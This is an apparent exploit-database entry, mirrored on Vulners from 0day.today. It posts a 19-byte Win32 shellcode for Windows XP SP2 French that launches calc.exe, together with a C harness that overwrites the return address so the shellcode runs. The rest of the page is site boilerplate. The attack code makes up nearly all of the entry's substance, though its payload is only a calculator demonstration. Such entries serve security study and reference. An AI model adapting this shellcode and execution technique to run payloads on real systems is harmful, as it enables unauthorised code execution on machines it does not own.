Lucene search
K

win32 Shellcode XP SP2 FR (calc) 19 bytes

🗓️ 20 Jan 2010 00:00:00Reported by SkuLL-HacKeRType 
zdt
 zdt
🔗 0day.today👁 29 Views

Win32 Shellcode XP SP2 FR (calc) 19 bytes - Execute calc.ex

Code
=========================================
Win32 Shellcode XP SP2 FR (calc) 19 bytes
=========================================


/*
Author: SkuLL-HacKeR
 
 
// Win32 Shellcode Collection (calc) 19 bytes
// Shellcode Exec Calc.exe
// Tested on XP SP2 FR
#include "stdio.h"
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
                            "\xBF\x77\xFF\xD2\xCC"
                            "\xE8\xF3\xFF\xFF\xFF"
                            "\x63\x61\x6C\x63";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}



#  0day.today [2018-04-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jan 2010 00:00Current
7High risk
Vulners AI Score7
29